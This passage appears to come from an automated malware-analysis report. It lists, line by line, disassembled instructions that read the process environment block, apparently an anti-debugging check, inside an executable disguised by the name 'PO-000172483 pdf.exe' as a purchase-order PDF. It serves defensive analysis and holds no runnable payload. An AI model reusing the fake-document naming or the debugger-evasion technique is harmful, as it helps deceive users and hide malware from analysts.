Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE10E mov eax, dword ptr fs:[00000030h]	7_2_017EE10E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE10E mov ecx, dword ptr fs:[00000030h]	7_2_017EE10E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE10E mov eax, dword ptr fs:[00000030h]	7_2_017EE10E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE10E mov eax, dword ptr fs:[00000030h]	7_2_017EE10E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE10E mov ecx, dword ptr fs:[00000030h]	7_2_017EE10E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE10E mov eax, dword ptr fs:[00000030h]	7_2_017EE10E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE10E mov ecx, dword ptr fs:[00000030h]	7_2_017EE10E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017701F8 mov eax, dword ptr fs:[00000030h]	7_2_017701F8
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01800115 mov eax, dword ptr fs:[00000030h]	7_2_01800115
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE1D0 mov eax, dword ptr fs:[00000030h]	7_2_017BE1D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE1D0 mov eax, dword ptr fs:[00000030h]	7_2_017BE1D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE1D0 mov ecx, dword ptr fs:[00000030h]	7_2_017BE1D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE1D0 mov eax, dword ptr fs:[00000030h]	7_2_017BE1D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017BE1D0 mov eax, dword ptr fs:[00000030h]	7_2_017BE1D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C019F mov eax, dword ptr fs:[00000030h]	7_2_017C019F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C019F mov eax, dword ptr fs:[00000030h]	7_2_017C019F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C019F mov eax, dword ptr fs:[00000030h]	7_2_017C019F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C019F mov eax, dword ptr fs:[00000030h]	7_2_017C019F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173A197 mov eax, dword ptr fs:[00000030h]	7_2_0173A197
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173A197 mov eax, dword ptr fs:[00000030h]	7_2_0173A197
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173A197 mov eax, dword ptr fs:[00000030h]	7_2_0173A197
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017FC188 mov eax, dword ptr fs:[00000030h]	7_2_017FC188
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017FC188 mov eax, dword ptr fs:[00000030h]	7_2_017FC188
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01780185 mov eax, dword ptr fs:[00000030h]	7_2_01780185
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E4180 mov eax, dword ptr fs:[00000030h]	7_2_017E4180
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E4180 mov eax, dword ptr fs:[00000030h]	7_2_017E4180
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176C073 mov eax, dword ptr fs:[00000030h]	7_2_0176C073
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01742050 mov eax, dword ptr fs:[00000030h]	7_2_01742050
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C6050 mov eax, dword ptr fs:[00000030h]	7_2_017C6050
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_018060B8 mov eax, dword ptr fs:[00000030h]	7_2_018060B8
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_018060B8 mov ecx, dword ptr fs:[00000030h]	7_2_018060B8
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D6030 mov eax, dword ptr fs:[00000030h]	7_2_017D6030
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173A020 mov eax, dword ptr fs:[00000030h]	7_2_0173A020
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173C020 mov eax, dword ptr fs:[00000030h]	7_2_0173C020
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175E016 mov eax, dword ptr fs:[00000030h]	7_2_0175E016
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175E016 mov eax, dword ptr fs:[00000030h]	7_2_0175E016
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175E016 mov eax, dword ptr fs:[00000030h]	7_2_0175E016
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175E016 mov eax, dword ptr fs:[00000030h]	7_2_0175E016
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C4000 mov ecx, dword ptr fs:[00000030h]	7_2_017C4000
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E2000 mov eax, dword ptr fs:[00000030h]	7_2_017E2000
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E2000 mov eax, dword ptr fs:[00000030h]	7_2_017E2000
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E2000 mov eax, dword ptr fs:[00000030h]	7_2_017E2000
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E2000 mov eax, dword ptr fs:[00000030h]	7_2_017E2000
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E2000 mov eax, dword ptr fs:[00000030h]	7_2_017E2000
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E2000 mov eax, dword ptr fs:[00000030h]	7_2_017E2000
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E2000 mov eax, dword ptr fs:[00000030h]	7_2_017E2000
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E2000 mov eax, dword ptr fs:[00000030h]	7_2_017E2000
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173C0F0 mov eax, dword ptr fs:[00000030h]	7_2_0173C0F0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017820F0 mov ecx, dword ptr fs:[00000030h]	7_2_017820F0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173A0E3 mov ecx, dword ptr fs:[00000030h]	7_2_0173A0E3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C60E0 mov eax, dword ptr fs:[00000030h]	7_2_017C60E0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017480E9 mov eax, dword ptr fs:[00000030h]	7_2_017480E9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C20DE mov eax, dword ptr fs:[00000030h]	7_2_017C20DE
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D80A8 mov eax, dword ptr fs:[00000030h]	7_2_017D80A8
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174208A mov eax, dword ptr fs:[00000030h]	7_2_0174208A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E437C mov eax, dword ptr fs:[00000030h]	7_2_017E437C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C035C mov eax, dword ptr fs:[00000030h]	7_2_017C035C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C035C mov eax, dword ptr fs:[00000030h]	7_2_017C035C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C035C mov eax, dword ptr fs:[00000030h]	7_2_017C035C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C035C mov ecx, dword ptr fs:[00000030h]	7_2_017C035C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C035C mov eax, dword ptr fs:[00000030h]	7_2_017C035C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C035C mov eax, dword ptr fs:[00000030h]	7_2_017C035C
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E8350 mov ecx, dword ptr fs:[00000030h]	7_2_017E8350
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C2349 mov eax, dword ptr fs:[00000030h]	7_2_017C2349
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173C310 mov ecx, dword ptr fs:[00000030h]	7_2_0173C310
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01760310 mov ecx, dword ptr fs:[00000030h]	7_2_01760310
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177A30B mov eax, dword ptr fs:[00000030h]	7_2_0177A30B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177A30B mov eax, dword ptr fs:[00000030h]	7_2_0177A30B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177A30B mov eax, dword ptr fs:[00000030h]	7_2_0177A30B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0175E3F0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0175E3F0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0175E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0175E3F0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017763FF mov eax, dword ptr fs:[00000030h]	7_2_017763FF
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017503E9 mov eax, dword ptr fs:[00000030h]	7_2_017503E9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017503E9 mov eax, dword ptr fs:[00000030h]	7_2_017503E9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017503E9 mov eax, dword ptr fs:[00000030h]	7_2_017503E9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017503E9 mov eax, dword ptr fs:[00000030h]	7_2_017503E9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017503E9 mov eax, dword ptr fs:[00000030h]	7_2_017503E9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017503E9 mov eax, dword ptr fs:[00000030h]	7_2_017503E9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017503E9 mov eax, dword ptr fs:[00000030h]	7_2_017503E9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017503E9 mov eax, dword ptr fs:[00000030h]	7_2_017503E9
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE3DB mov eax, dword ptr fs:[00000030h]	7_2_017EE3DB
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE3DB mov eax, dword ptr fs:[00000030h]	7_2_017EE3DB
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE3DB mov ecx, dword ptr fs:[00000030h]	7_2_017EE3DB
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017EE3DB mov eax, dword ptr fs:[00000030h]	7_2_017EE3DB
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E43D4 mov eax, dword ptr fs:[00000030h]	7_2_017E43D4
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017E43D4 mov eax, dword ptr fs:[00000030h]	7_2_017E43D4
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017FC3CD mov eax, dword ptr fs:[00000030h]	7_2_017FC3CD
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0174A3C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0174A3C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0174A3C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0174A3C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0174A3C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0174A3C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017483C0 mov eax, dword ptr fs:[00000030h]	7_2_017483C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017483C0 mov eax, dword ptr fs:[00000030h]	7_2_017483C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017483C0 mov eax, dword ptr fs:[00000030h]	7_2_017483C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017483C0 mov eax, dword ptr fs:[00000030h]	7_2_017483C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C63C0 mov eax, dword ptr fs:[00000030h]	7_2_017C63C0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0180A352 mov eax, dword ptr fs:[00000030h]	7_2_0180A352
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01738397 mov eax, dword ptr fs:[00000030h]	7_2_01738397
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01738397 mov eax, dword ptr fs:[00000030h]	7_2_01738397
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01738397 mov eax, dword ptr fs:[00000030h]	7_2_01738397
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176438F mov eax, dword ptr fs:[00000030h]	7_2_0176438F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176438F mov eax, dword ptr fs:[00000030h]	7_2_0176438F
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173E388 mov eax, dword ptr fs:[00000030h]	7_2_0173E388
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173E388 mov eax, dword ptr fs:[00000030h]	7_2_0173E388
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173E388 mov eax, dword ptr fs:[00000030h]	7_2_0173E388
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017F0274 mov eax, dword ptr fs:[00000030h]	7_2_017F0274
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01744260 mov eax, dword ptr fs:[00000030h]	7_2_01744260
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01744260 mov eax, dword ptr fs:[00000030h]	7_2_01744260
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01744260 mov eax, dword ptr fs:[00000030h]	7_2_01744260
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173826B mov eax, dword ptr fs:[00000030h]	7_2_0173826B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173A250 mov eax, dword ptr fs:[00000030h]	7_2_0173A250
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01746259 mov eax, dword ptr fs:[00000030h]	7_2_01746259
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C8243 mov eax, dword ptr fs:[00000030h]	7_2_017C8243
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C8243 mov ecx, dword ptr fs:[00000030h]	7_2_017C8243
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0173823B mov eax, dword ptr fs:[00000030h]	7_2_0173823B
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017502E1 mov eax, dword ptr fs:[00000030h]	7_2_017502E1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017502E1 mov eax, dword ptr fs:[00000030h]	7_2_017502E1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017502E1 mov eax, dword ptr fs:[00000030h]	7_2_017502E1
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0174A2C3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0174A2C3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0174A2C3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0174A2C3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0174A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0174A2C3
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017502A0 mov eax, dword ptr fs:[00000030h]	7_2_017502A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017502A0 mov eax, dword ptr fs:[00000030h]	7_2_017502A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D62A0 mov eax, dword ptr fs:[00000030h]	7_2_017D62A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D62A0 mov ecx, dword ptr fs:[00000030h]	7_2_017D62A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D62A0 mov eax, dword ptr fs:[00000030h]	7_2_017D62A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D62A0 mov eax, dword ptr fs:[00000030h]	7_2_017D62A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D62A0 mov eax, dword ptr fs:[00000030h]	7_2_017D62A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D62A0 mov eax, dword ptr fs:[00000030h]	7_2_017D62A0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E284 mov eax, dword ptr fs:[00000030h]	7_2_0177E284
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E284 mov eax, dword ptr fs:[00000030h]	7_2_0177E284
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C0283 mov eax, dword ptr fs:[00000030h]	7_2_017C0283
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C0283 mov eax, dword ptr fs:[00000030h]	7_2_017C0283
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017C0283 mov eax, dword ptr fs:[00000030h]	7_2_017C0283
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177656A mov eax, dword ptr fs:[00000030h]	7_2_0177656A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177656A mov eax, dword ptr fs:[00000030h]	7_2_0177656A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177656A mov eax, dword ptr fs:[00000030h]	7_2_0177656A
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748550 mov eax, dword ptr fs:[00000030h]	7_2_01748550
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01748550 mov eax, dword ptr fs:[00000030h]	7_2_01748550
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750535 mov eax, dword ptr fs:[00000030h]	7_2_01750535
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750535 mov eax, dword ptr fs:[00000030h]	7_2_01750535
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750535 mov eax, dword ptr fs:[00000030h]	7_2_01750535
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750535 mov eax, dword ptr fs:[00000030h]	7_2_01750535
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750535 mov eax, dword ptr fs:[00000030h]	7_2_01750535
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01750535 mov eax, dword ptr fs:[00000030h]	7_2_01750535
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E53E mov eax, dword ptr fs:[00000030h]	7_2_0176E53E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E53E mov eax, dword ptr fs:[00000030h]	7_2_0176E53E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E53E mov eax, dword ptr fs:[00000030h]	7_2_0176E53E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E53E mov eax, dword ptr fs:[00000030h]	7_2_0176E53E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E53E mov eax, dword ptr fs:[00000030h]	7_2_0176E53E
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017D6500 mov eax, dword ptr fs:[00000030h]	7_2_017D6500
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01814500 mov eax, dword ptr fs:[00000030h]	7_2_01814500
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01814500 mov eax, dword ptr fs:[00000030h]	7_2_01814500
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01814500 mov eax, dword ptr fs:[00000030h]	7_2_01814500
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01814500 mov eax, dword ptr fs:[00000030h]	7_2_01814500
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01814500 mov eax, dword ptr fs:[00000030h]	7_2_01814500
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01814500 mov eax, dword ptr fs:[00000030h]	7_2_01814500
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_01814500 mov eax, dword ptr fs:[00000030h]	7_2_01814500
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0176E5E7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0176E5E7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0176E5E7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0176E5E7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0176E5E7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0176E5E7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0176E5E7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0176E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0176E5E7
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017425E0 mov eax, dword ptr fs:[00000030h]	7_2_017425E0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177C5ED mov eax, dword ptr fs:[00000030h]	7_2_0177C5ED
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177C5ED mov eax, dword ptr fs:[00000030h]	7_2_0177C5ED
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_017465D0 mov eax, dword ptr fs:[00000030h]	7_2_017465D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0177A5D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0177A5D0
Source: C:\Users\user\Desktop\PO-000172483 pdf.exe	Code function: 7_2_0177E5CF mov eax, dword ptr fs:[00000030h]	7_2_0177E5CF
